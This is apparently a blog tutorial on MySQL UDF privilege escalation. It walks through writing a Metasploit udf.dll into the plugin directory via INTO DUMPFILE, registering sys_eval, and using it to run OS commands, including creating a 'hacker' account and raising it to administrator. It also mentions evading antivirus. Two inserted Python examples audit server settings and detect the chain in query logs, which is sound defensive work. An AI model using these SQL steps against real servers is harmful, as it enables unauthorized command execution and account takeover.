MySQL (UDF privilege escalation)
2022-07-05 06:32:00 【Viva alive】
MySQL UDF privilege escalation
UDF
A UDF is a user-defined function in MySQL: you write your own functions in a shared library (for example a DLL on Windows) and then call them from inside MySQL.
Prerequisites
- There is a SQL injection vulnerability
- MySQL's file read/write restriction, the secure_file_priv variable, is empty
- The database user has file read and write privileges
- The database user is allowed to connect from other hosts
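A defender can check the prerequisites above from a single snapshot of the server's settings. The audit below is an added example, not part of the original post: the snapshot dicts are constructed stand-ins for the output of SHOW VARIABLES and of SELECT user, host, File_priv FROM mysql.user, and the function names are this example's own. It applies the real secure_file_priv semantics (NULL disables file operations, an empty value leaves them unrestricted, a directory confines them to that tree) and reports whether INTO DUMPFILE could reach the plugin directory at all.

```python
"""Audit a MySQL settings snapshot against the UDF-escalation prerequisites.

Added example, not from the original post. Snapshots are constructed; the
function names are this example's own.
"""

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def _norm(path):
    """Normalise a path for prefix comparison (Windows paths may mix / and \\)."""
    return path.replace("\\", "/").rstrip("/").lower()


def file_ops_allowed(secure_file_priv, path):
    """Apply secure_file_priv semantics to a candidate file path.

    None (NULL)  -> LOAD_FILE / INTO OUTFILE / INTO DUMPFILE are disabled
    '' (empty)   -> file operations are unrestricted (the setting the chain needs)
    <directory>  -> file operations are confined to that directory tree
    """
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    return _norm(path).startswith(_norm(secure_file_priv) + "/")


def audit_udf_exposure(snapshot):
    """Return which of the prerequisites hold for the given snapshot."""
    variables = snapshot["variables"]
    users = snapshot["users"]
    plugin_dir = variables.get("plugin_dir", "")
    findings = {
        # Can INTO DUMPFILE reach the directory a UDF library must live in?
        "file_ops_reach_plugin_dir": bool(plugin_dir)
        and file_ops_allowed(variables.get("secure_file_priv"), plugin_dir),
        # Accounts holding the FILE privilege (needed for load_file / dumpfile)
        "file_priv_users": sorted(u["user"] for u in users if u["File_priv"] == "Y"),
        # Accounts that may connect from somewhere other than the local machine
        "remote_users": sorted(
            f"{u['user']}@{u['host']}" for u in users if u["host"] not in LOCAL_HOSTS
        ),
        # UDFs already registered in mysql.func (a sys_eval here is a red flag)
        "registered_udfs": sorted(f["name"] for f in snapshot.get("func", [])),
    }
    findings["exposed"] = (
        findings["file_ops_reach_plugin_dir"] and bool(findings["file_priv_users"])
    )
    return findings


# Constructed snapshot: the configuration the post relies on
EXPOSED = {
    "variables": {
        "secure_file_priv": "",  # empty: file operations unrestricted
        "plugin_dir": "F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/",
    },
    "users": [
        {"user": "root", "host": "localhost", "File_priv": "Y"},
        {"user": "osanda", "host": "%", "File_priv": "Y"},
        {"user": "webapp", "host": "localhost", "File_priv": "N"},
    ],
    "func": [],
}

# Constructed snapshot: same server after confining file operations and
# dropping FILE from the application account
HARDENED = {
    "variables": {
        "secure_file_priv": "C:/ProgramData/MySQL/Uploads/",
        "plugin_dir": "F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/",
    },
    "users": [
        {"user": "root", "host": "localhost", "File_priv": "Y"},
        {"user": "osanda", "host": "%", "File_priv": "N"},
        {"user": "webapp", "host": "localhost", "File_priv": "N"},
    ],
    "func": [],
}

if __name__ == "__main__":
    for label, snap in (("exposed", EXPOSED), ("hardened", HARDENED)):
        print(label, audit_udf_exposure(snap))
```

The key point the audit makes visible is that secure_file_priv set to a directory is enough to break the chain even when FILE privilege remains, because the plugin directory is then outside the permitted tree; the remote-user and registered-UDF lists are reported for context rather than folded into the verdict.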
Steps
- Use the SQL injection to obtain the database user name and password, and crack the password to recover the plaintext
- Connect to the database as the osanda user
- Check the osanda user's privileges

```sql
select * from mysql.user where user = substring_index(user(), '@', 1) \G
```

It turns out the user has all privileges.
Writing the UDF DLL library
Check the system architecture and OS type so that the right udf file can be chosen later (there are 4 of them):

```sql
show variables like '%compile%';
```

**Starting with MySQL 5.0.67, the UDF library must be located in the plugin folder, which can be found through the global variable @@plugin_dir. This variable can be viewed and edited in the mysql.ini file.** By default, however, the plugin directory does not exist.

```sql
select @@plugin_dir;
```

If the MySQL version is below 5.1.60, the following can be used to create the folder:

```sql
select 'xxx' into outfile 'F:/phpstudy_pro/Extensions/MySQL5.7.26/lib::$INDEX_ALLOCATION';
select 'xxx' into outfile 'F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin::$INDEX_ALLOCATION';
```

But when I tested on version 5.7.26, these two SQL statements could no longer create the folder; MySQL may have added some security policy.
Starting with MySQL 5.0.67, the file must be located in the plugin directory, which is given by the value of the plugin_dir system variable. If plugin_dir is empty, the behaviour used before 5.0.67 applies: the file must be in a directory searched by the system's dynamic linker.
In old versions, you could upload the DLL file to one of the following locations and create the new UDF function:
- @@datadir
- @@basedir\bin
- C:\windows
- C:\windows\system
- C:\windows\system32
Metasploit ships with ready-made udf files that can be used.
Locate udf.dll:
You can also get it from GitHub:
https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql
For a 32-bit target use the 32-bit file and for a 64-bit target the 64-bit one; choose the dll for Windows and the so for Linux.
Convert udf.dll to hexadecimal and save it on the local machine; here I save it under the F:/phpstudy_pro/WWW/ directory:

```sql
select hex(load_file('F:/phpstudy_pro/WWW/lib_mysqludf_sys_64.dll')) into dumpfile 'F:/phpstudy_pro/WWW/udf.txt';
```

Then export the hexadecimal value from the newly generated udf.txt into the plugin directory on the target host:

```sql
select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000… into dumpfile "F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/udf.dll";
```

This may fail because the target host has no plugin directory.
At this point, create the lib/plugin directory.
Export again and it succeeds.
Having udf.dll on the target host is not enough; we still have to create the functions we want to use inside MySQL.
Although the author defines many functions in udf.dll, we only need one of them: sys_eval().
What sys_eval does
This function executes a system command and returns its standard output for display on screen. (It is similar to sqlmap's --os-shell, except that sys_eval can successfully run system commands that sqlmap cannot; see the effect below.)
Creating sys_eval

```sql
create function sys_eval returns string soname 'udf.dll';
```

Testing sys_eval

```sql
select * from mysql.func where name = 'sys_eval';
```

If a row is returned, the function was created successfully.
Deleting sys_eval

```sql
drop function sys_eval;
```

If you no longer want this custom function, delete it with this command.
Once created, you can use it:

```sql
select sys_eval('dir');
```
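Every step of the chain described above leaves a distinct statement in MySQL's general query log (or in an audit plugin's output), which makes the sequence straightforward to detect. The script below is an added example, not part of the original post: it parses constructed log lines in the 5.7-style general_log layout (time, connection id, command and argument, tab-separated), tags the staging of the library as hex, the write of a .dll/.so via INTO DUMPFILE, the CREATE FUNCTION ... SONAME registration and the sys_eval call, and reports connections that completed the install. Rule names and function names are this example's own.

```python
"""Detect the UDF installation chain in MySQL general query log lines.

Added example, not from the original post. Log lines are constructed; the
5.7-style general_log layout is assumed; rule and function names are ours.
"""
import re

LOG_LINE = re.compile(r"^(?P<time>\S+)\t\s*(?P<conn>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")

# One detection rule per stage of the chain, matched against the query text
RULES = [
    ("library_staged_as_hex",
     re.compile(r"load_file\s*\(.*into\s+dumpfile", re.I | re.S)),
    ("udf_library_written",
     re.compile(r"into\s+dumpfile\s+['\"][^'\"]*\.(?:dll|so)['\"]", re.I)),
    ("udf_function_created",
     re.compile(r"create\s+(?:aggregate\s+)?function\s+\w+\s+returns\s+"
                r"(?:string|integer|real|decimal)\s+soname", re.I)),
    ("os_command_via_udf",
     re.compile(r"\bsys_eval\s*\(", re.I)),
]

# Constructed sample: connection 12 performs the chain, connection 13 is ordinary traffic
SAMPLE_LOG = "\n".join([
    "2022-07-05T06:32:00.000000Z\t   12 Query\tselect hex(load_file("
    "'F:/phpstudy_pro/WWW/lib_mysqludf_sys_64.dll')) into dumpfile 'F:/phpstudy_pro/WWW/udf.txt'",
    "2022-07-05T06:32:05.000000Z\t   12 Query\tselect 0x4d5a90000300 into dumpfile "
    "\"F:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/udf.dll\"",
    "2022-07-05T06:32:09.000000Z\t   12 Query\tcreate function sys_eval returns string soname 'udf.dll'",
    "2022-07-05T06:32:10.000000Z\t   12 Query\tselect * from mysql.func where name = 'sys_eval'",
    "2022-07-05T06:32:12.000000Z\t   12 Query\tselect sys_eval('dir')",
    "2022-07-05T06:33:00.000000Z\t   13 Query\tselect * from products where id = 42",
])


def parse_general_log(text):
    """Yield (time, connection id, query) for each Query line in the log."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m and m.group("cmd") == "Query":
            events.append((m.group("time"), int(m.group("conn")), m.group("arg")))
    return events


def match_rules(query):
    """Names of all rules that fire on a single query string."""
    return [name for name, rx in RULES if rx.search(query)]


def detect_udf_chain(text):
    """Map connection id -> ordered list of (rule, query) hits."""
    hits = {}
    for _, conn, query in parse_general_log(text):
        for rule in match_rules(query):
            hits.setdefault(conn, []).append((rule, query))
    return hits


def escalated_connections(hits):
    """Connections that both wrote a library file and registered a UDF from it."""
    return sorted(
        conn for conn, conn_hits in hits.items()
        if {"udf_library_written", "udf_function_created"} <= {r for r, _ in conn_hits}
    )


if __name__ == "__main__":
    chain = detect_udf_chain(SAMPLE_LOG)
    for conn, conn_hits in chain.items():
        for rule, query in conn_hits:
            print(f"conn {conn}: {rule}: {query[:60]}")
    print("completed UDF install on connections:", escalated_connections(chain))
```

The rules are deliberately keyed on the structural statements (a dumpfile write ending in a library extension and a CREATE FUNCTION with SONAME) rather than on the file name udf.dll, so a renamed library still trips them; the mysql.func lookup in the sample produces no hit, which is the intended negative.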
Next, enter a command that sqlmap cannot run at all. Never mind sqlmap; even running such a command locally requires opening an administrator prompt: adding a user, and then adding that user to the administrators group.
First open another cmd and look at the current users.
Then I use the sys_eval function to create the user hacker:

```sql
select sys_eval('net user hacker /add');
```

At this point Firefox popped up; with a keen nose it smelled something wrong, and I hurriedly clicked Allow to calm it down.
The result shows a piece of garbled text, but that does not stop the user from being added.
Check the current users again:
There is now an extra hacker user.
Next, promote the hacker user to administrator.
Open another cmd and look at the users in the administrators group: hacker has become an administrator.
This is what is commonly called udf privilege escalation.
Summary of difficulties
- How to create lib/plugin by other means (it is impossible to create it manually)
- How to bypass antivirus software such as Firefox